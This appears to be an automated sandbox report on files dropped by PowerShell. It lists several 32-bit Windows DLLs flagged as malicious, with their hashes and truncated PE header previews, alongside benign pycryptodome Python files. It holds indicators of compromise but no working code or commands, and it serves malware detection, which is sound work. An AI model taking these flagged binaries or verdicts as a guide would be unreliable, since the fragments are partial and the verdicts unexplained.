                                                                                                                                                                                                            SSDEEP:384:W92BTcKRIjVgtpO8l1KPSMgMkLVeL3LFuLPL1+L8SlOLTVeLcy2LT4z56ArZPn7:W92VctgXpbKcDq7KjqzKTqzQT4z467
                                                                                                                                                                                                            MD5:333B365ACD82DC8F6F0CA7051D1E6277
                                                                                                                                                                                                            SHA1:4471CD682540AEB828718FF54CFFA8D833908BCD
                                                                                                                                                                                                            SHA-256:2239864A72DF83B65F0759C1D349B94C3EA835F934E3C6CA535F8C6A42A5E443
                                                                                                                                                                                                            SHA-512:310742F079A8844FE5CB526EFD87F3CC8A6C09150E1A9E115597D042FB3D197D5E0163515E23B39A49CBA61B99E48E9EBE6819831DC7E69A7C7059BF154CCCC8
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........S...=...=...=.....=..<...=..<...=...<..=..8...=..9...=..>...=.?.5...=.?.=...=.?.....=.?.?...=.Rich..=.................PE..L...[..f...........!................K........@............................................@.........................@...........d...................................0...............................P...@............@..t............................text....,.......................... ..`.rdata..*....@.......2..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8704
                                                                                                                                                                                                            Entropy (8bit):5.006010317423641
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MVStfVPERtoj6YG7GVx4Mk4s/DjxjOEM0EWMmGffQzQrXd:+StfVPEPYMGVx3ABjOBIMVnEwN
                                                                                                                                                                                                            MD5:FD623F81F725431B18D7F54442A7D407
                                                                                                                                                                                                            SHA1:EE9C771E26E43C1D9FBCB1074F0DD3163F16B0B0
                                                                                                                                                                                                            SHA-256:DA10FC7F4D2B60E1DDF5CE3ED86434CDBFD2DFB8F6967AC6D7A55634B82483BB
                                                                                                                                                                                                            SHA-512:22CD400DBF50EE81E234D1B7FC5B5E6176640C91038325245AD2A22E2EE465740EE0F30AB4A1150E4A58B06415D1175A54631A6EDC5496D2BF75431A8CE7F440
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K......K..J..K..J..K..J...K..N..K..O..K..H..K./.C..K./.K..K./...K./.I..K.Rich.K.................PE..L...\..f...........!................N........ ...............................`............@..........................$......8%..P....@.......................P..@.... ............................... ..@............ ..h............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                            Entropy (8bit):6.5071055719866555
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:sLe7ScXjTsjMkUNTFYvuLhpJgLa0Mp8pAnQ+:ye7tvRkUZ0u9gLa1NQ+
                                                                                                                                                                                                            MD5:3E3C5B6B28DACAE042347CDD296B8DE0
                                                                                                                                                                                                            SHA1:0FAB1BD74DEC40024D29DE2ABCB3D8045D70725A
                                                                                                                                                                                                            SHA-256:20FD1AF9F295668126EED16AEE5B7BAD68268C256E24FDF0731008FE84EF3E2D
                                                                                                                                                                                                            SHA-512:1478B4FF907F996E1AD4DB142AEED48AAF5BD2DEE9A8B6B1DEEC98DF6D6F0BFBBD2AB2E433E6CD956E5633978D2503549FF0EC437226A36068F940D878940EEA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V.Q.8.Q.8.Q.8.X..U.8...9.S.8...9.R.8.Q.9.s.8...=.Z.8...<.[.8...;.P.8..0.P.8..8.P.8....P.8..:.P.8.RichQ.8.........................PE..L...Z..f...........!........."......N........0............................................@..........................E.......E..d....`.......................p..l....@...............................A..@............0..x............................text...S........................... ..`.rdata.......0....... ..............@..@.data........P.......:..............@....rsrc........`.......<..............@..@.reloc..l....p.......>..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                            Entropy (8bit):5.63441578090087
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:AiD03UVPEOvIr4hqTwesjOXxiLtTi5rqzL4X/EAJMVnKGWNu:AiDXgGqQjgxiZwM4X/EAgnKGs
                                                                                                                                                                                                            MD5:67F844EF481A78569CBCC57D4AA101E4
                                                                                                                                                                                                            SHA1:57C5A473671640DBF2555ED6A562E25DC2143BBD
                                                                                                                                                                                                            SHA-256:EEE8F722BDB410B955FD75DE7C82C0D9C38BDF45F09022361338420581E1E853
                                                                                                                                                                                                            SHA-512:C39DA4B9BBDB8A887EAD2067F4E6A8632DE54CCE5107C7B32B88AD0EEFD0B3FA0DC11216E5D4AC515561DFA5255478B78AFC7C38370EBB1135DD316AFEDB3E1B
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R.Q.<.Q.<.Q.<.X..U.<...=.S.<...=.R.<.Q.=.r.<...9.Z.<...8.[.<...?.P.<..4.P.<..<.P.<....P.<..>.P.<.RichQ.<.................PE..L...^..f...........!................N........0...............................p............@..........................4.......5..d....P.......................`..`....0...............................0..@............0..|............................text............................... ..`.rdata..4....0....... ..............@..@.data........@.......*..............@....rsrc........P.......,..............@..@.reloc..`....`......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                                                            Entropy (8bit):5.037494010682804
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:sGM4VPErNKELE6ImKVhkcE/xgujOI4Gz4j7nMDOZ1MmGffzcATXdr:sj4VPEXvInVhTQWujOCz4cyXMVnAINr
                                                                                                                                                                                                            MD5:87E0C9F18A698468498410420ECF67E0
                                                                                                                                                                                                            SHA1:5767641069EA527341BB87956EF68A65AB90D2FF
                                                                                                                                                                                                            SHA-256:E39B2B750F5FE0C9A66F31A7B9DB8037F2D3CAD54E5F3F44D470EEF9D50E340A
                                                                                                                                                                                                            SHA-512:CD56D8381010189A0995DF58B183D5DBEF51ADA2FFBDBDBD57E90A1D102119C066E3334DC4E1EC3C236BECC80E1DBD7F988D97BD3D85B807FB3C57FE7FF398B5
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V.Q.8.Q.8.Q.8.X..U.8...9.S.8...9.R.8.Q.9.s.8...=.Z.8...<.[.8...;.P.8..0.P.8..8.P.8....P.8..:.P.8.RichQ.8.........................PE..L...^..f...........!................N........0...............................p............@..........................4......x5..d....P.......................`..T....0...............................0..@............0..x............................text............................... ..`.rdata.......0......................@..@.data........@....... ..............@....rsrc........P......."..............@..@.reloc..T....`.......$..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9670
                                                                                                                                                                                                            Entropy (8bit):4.704181472916713
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9qrskrs9t3q/IYRDPyZmiCbebOg5n8znjoqOGFyk:0rskrs9VqVwUbbeSg58zjoqOi3
                                                                                                                                                                                                            MD5:42FF26371B56C5C3B6EB371D0DD95D0D
                                                                                                                                                                                                            SHA1:90ADFE0DFC3912F2360749B29E4793B6793F26C9
                                                                                                                                                                                                            SHA-256:D810141E84ABEF8948D031C63BBC72D9893090AFF62CD21FA89AB64DE09CEC84
                                                                                                                                                                                                            SHA-512:7BCF47527D8F034A8DA182FC5125F63ED0A3685C8D1D19EC6D6013D9BABA452921612196590D03309BF878166021A5C5BA9AC30C7E94546A7F913E5DDA250420
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):938
                                                                                                                                                                                                            Entropy (8bit):4.770904354494787
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1REL4yNT37rEWAnm1WWLB/qs/qn/HLB/M4LB/1/s/3LB/QVP:l4DQxMB/qs/qn/rB/MGB/1/s/7B/QVP
                                                                                                                                                                                                            MD5:17D9AB9AB96D9645BD7BAA7403392355
                                                                                                                                                                                                            SHA1:63DFBC424021764FA0B7BE930C76F99F7D097DAB
                                                                                                                                                                                                            SHA-256:2F79FA6D217978DB2C5A7CF297E73E555C2100E86FA5B2CB4C1DEFFCCAE353DF
                                                                                                                                                                                                            SHA-512:E6A62201B77C98236B57E93275C666C03CE6D17DF29380D871DA9F55F9D2C01B4EE1901C8C9A95CB7307FD06CCD9CF9CD6FF768693EB30706F236439B253E0D4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Any, Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2b_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2b_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... digest_bytes: int = ...,... digest_bits: int = ...,... key: Buffer = ...,... update_after_digest: bool = ...) -> BLAKE2b_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2b_Hash: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9676
                                                                                                                                                                                                            Entropy (8bit):4.694251411457854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9qrskrs9t3q/IFU1Uy9XiCJ5bfD5Z8znjJQfzdT:0rskrs9VqIARbJ5DD52zjJQfzx
                                                                                                                                                                                                            MD5:78E109013B7F37E3CA1F6299E2B222D4
                                                                                                                                                                                                            SHA1:1D70156D7C14F8268882C588E67F27CBC55B4479
                                                                                                                                                                                                            SHA-256:19798A2A1D438C0DD3538193B4284C11DA04D6FD52F7E58AEA9A95AF1E8BAE68
                                                                                                                                                                                                            SHA-512:A6978AEDD9A4567F6231FFE10072227B55A4CF97132009FA1491321F11EDA3C1E5AE119156900B19D64E6E73A85DBF6F3D8C04D49471FEE68754FF8A8C0951A1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):765
                                                                                                                                                                                                            Entropy (8bit):4.852088276642615
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBPvIY3MRyaRyLu1ApV2+tCwF5RwW0WFWIZyp4LB/d3/i3/3LB/QVxI:1RE6T3QrEWAnJ1Wr4LB/1/s/3LB/QVi
                                                                                                                                                                                                            MD5:43A377A44F7A80190635F78E745C64C3
                                                                                                                                                                                                            SHA1:FDDEC7439E99FF7376364061B817E985EC291550
                                                                                                                                                                                                            SHA-256:25933F08745028C43450B44E6926A00942023E68BF934D2A4D032B8F9557C251
                                                                                                                                                                                                            SHA-512:8C087F9A1BFF5B0F48A2B766CB4B81BBEF8D18461C9369C71F4431D90343822099A6DAFD74DA565D53D43131A727228BB8487C8503ADC4573E585187B76BDE5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Any, Union....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2s_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2s_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self, **kwargs: Any) -> BLAKE2s_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2s_Hash: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10810
                                                                                                                                                                                                            Entropy (8bit):4.6888886762336766
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:HJqFQHvo7ESYvHPXmAzr5zkZYewd/3SIzODA/u42MZZFsuKFYR4Aeqt86+:HJYQHvqAzhkZYPN17Zz/pvP+
                                                                                                                                                                                                            MD5:CB84488361E5F32910E69C4132E5B766
                                                                                                                                                                                                            SHA1:0591BE7FF0945B36459945ADFDADC3159130509B
                                                                                                                                                                                                            SHA-256:B61E587E5AA8FD5F958F2C3DAA7E8F8914C3D33D162A3EE4CCF7DCD8277AB56D
                                                                                                                                                                                                            SHA-512:39B5FC22B4456E0972D636A2F857B643931150723EA9E4FE42F9E663A9453BD24B511BA841D508005259DD2D0A9BC245CF0AB7C5EC9AEEEEEC446DA769E51D4A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Hash/CMAC.py - Implements the CMAC algorithm..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =============
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):852
                                                                                                                                                                                                            Entropy (8bit):4.7944416507058545
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RM7CNyT3xFFAo6atxyW1W2oILB/jHV/PtN/Iqw+y:c8ihh+2VB/B/PX/Zw/
                                                                                                                                                                                                            MD5:2932E4BF5ECDFE63B31A60E94D12EF3D
                                                                                                                                                                                                            SHA1:369E08734F3A29B7D68FC99B87C20DCE2945A6C7
                                                                                                                                                                                                            SHA-256:8A9787A689F900E660207C419A0C2B66D3D40DB46D09F4EA9C19543640D26F57
                                                                                                                                                                                                            SHA-512:723E90748E13290619B03A767ABE5F040149F42E36F6899648F8F450D9297EAC9F560ADBBB1EDCAA2410DF428CBBCAC55D311E6657704B5CA593707CD3496556
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict, Any....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class CMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... ciphermod: ModuleType,.... cipher_params: Dict[str, Any],.. mac_len: int, update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> CMAC: ..... def copy(self) -> CMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...ciphermod: ModuleType = ...,...cipher_params: Dict[str, Any] = ...,...mac_len: int = ...,.. update_after_digest: bool = ...) -> CMAC: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8383
                                                                                                                                                                                                            Entropy (8bit):5.035054686221352
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:5J0YDqrYJALrYJHdt3EHGuIWH8ESYXcVGed7VobGKKMidLQBrR8ba/jVtbOixcSc:5JLqrskrs9t3q/IycVGlhiwNRSqzneLl
                                                                                                                                                                                                            MD5:1B694324354191939445989D02B57552
                                                                                                                                                                                                            SHA1:459F3C732F46D703844BE242590867B7C336257C
                                                                                                                                                                                                            SHA-256:BF5BDB55739BC144FFD51BE8696DF86FDDB749EFC794105122BA6882062D1F77
                                                                                                                                                                                                            SHA-512:559F55B868EBE7C088617A6E960622C75D90138720FF661BCABF74A0C01CB4D52F9F6B0C200CBF3B07DA7457BBED8CC9A445A876DB6232CBE05387BE9087DCEB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:#..# HMAC.py - Implements the HMAC algorithm as described by RFC 2104...#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAI
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):649
                                                                                                                                                                                                            Entropy (8bit):4.783061054533155
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1Ro8s7REYB6IvIY3YcRyTkpYRyc1AQ2ZcQ0WrQwgcxW5RwW0WFW2orULB/Q0WHQ4:1RM7C8T3xWFAlrVxW1W2oILB/SH+y
                                                                                                                                                                                                            MD5:14A386A671119C5A919A33425DBB267C
                                                                                                                                                                                                            SHA1:938FCE9D2F2D8D12B4E6DCE66CF634F0597E79C5
                                                                                                                                                                                                            SHA-256:C2C617969E9C441DCC4F844E9B8BA9767F49999272C239BDE88D5F4FAF6A672C
                                                                                                                                                                                                            SHA-512:99637CA962FF596AB9A740A3360DCA5989F0CA1DBC23C90926A213FC50A3E7A5FBC92DDDA0C62625FAA9A273CE9D6D50BFAC8A9D812BEC12DA2AD8CFE1D6D141
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class HMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... digestmod: ModuleType) -> None: ..... def update(self, msg: Buffer) -> HMAC: ..... def copy(self) -> HMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...digestmod: ModuleType = ...) -> HMAC: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6128
                                                                                                                                                                                                            Entropy (8bit):5.060949769894483
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:MMDqrYJALrYJHdt3EHGuIWEHrU6vEjHPL4rSgLT2MniHOFEugEjfJQ69t65F:Nqrskrs9t3q/IytSniHYnCK4F
                                                                                                                                                                                                            MD5:FFA9326A97D6D9F07CC037565AEF8134
                                                                                                                                                                                                            SHA1:474261D53BE76A00B36A836980CC3C6DC7483794
                                                                                                                                                                                                            SHA-256:2784C94AFD4E41E49E3370AF0334D1578402E2CF51BFA1E57561D74EAFB5D9A4
                                                                                                                                                                                                            SHA-512:8B162E0D0843F7DB0AD2D5831A21290A38563E22628A4D20D83EA6D7BC3BBAF71228E8FC1BC2F0B8EDCD6F44800BB909613275A3E14FAF7AF088BE9CE9569D7E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):936
                                                                                                                                                                                                            Entropy (8bit):4.361612751830179
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1REV4yNT3bAGJvdgK1WWLB/V0/V1LBGL8otLB/SmLj:h4rvVsMB/V0/VBBc8cB/S8j
                                                                                                                                                                                                            MD5:AB6420FC357655A5E7064F63055C551C
                                                                                                                                                                                                            SHA1:C936732267AB86FF4C74D262883948A23FAF2819
                                                                                                                                                                                                            SHA-256:383B57B62578122CD924BFA4DCB324233ED0D7A847F89D16BDBD3ED8251240C2
                                                                                                                                                                                                            SHA-512:EA97C574488210232741126FD97BAC54241937444DAAB8060C6DB1B5965B1D61EDB17643C4B6076E4DEBEA1B8BD15C3285728637944C2352F9E822CF85E4AF36
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class KMAC_Hash(object):.... def __init__(self,.. data: Buffer,.. key: Buffer,.. mac_len: int,.. custom: Buffer,.. oid_variant: str,.. cshake: ModuleType,.. rate: int) -> None: ....... def update(self, data: Buffer) -> KMAC_Hash: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... mac_len: int = ...,... key: Buffer = ...,.. custom: Buffer = ...) -> KMAC_Hash: .........def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2980
                                                                                                                                                                                                            Entropy (8bit):5.271012086144821
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:MMWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+Q9JuEAnxxh2wGl6mDxcUROfnSO6d2:MMDqrYJALrYJHdt3EHGuIWH9Ju5JQ66E
                                                                                                                                                                                                            MD5:5D8FCE4FF68CED1B7951320BF774725A
                                                                                                                                                                                                            SHA1:50F60C4DEC5C1CF84A2182347937673B8CDDEAEB
                                                                                                                                                                                                            SHA-256:5DF6B48163BBBEA77D5B624E1E07B95F25390DB1430D45AD5CAB902E477A64A4
                                                                                                                                                                                                            SHA-512:DB2ABAD56E2E426C7BDF3E6BAEDFD3EE390FF495A032CB8F0CAFC4DAF84166C388B5EA1CC70FE45518A4F640A65A407E0E857D61EEACFC85C7ACD5895D007AA9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
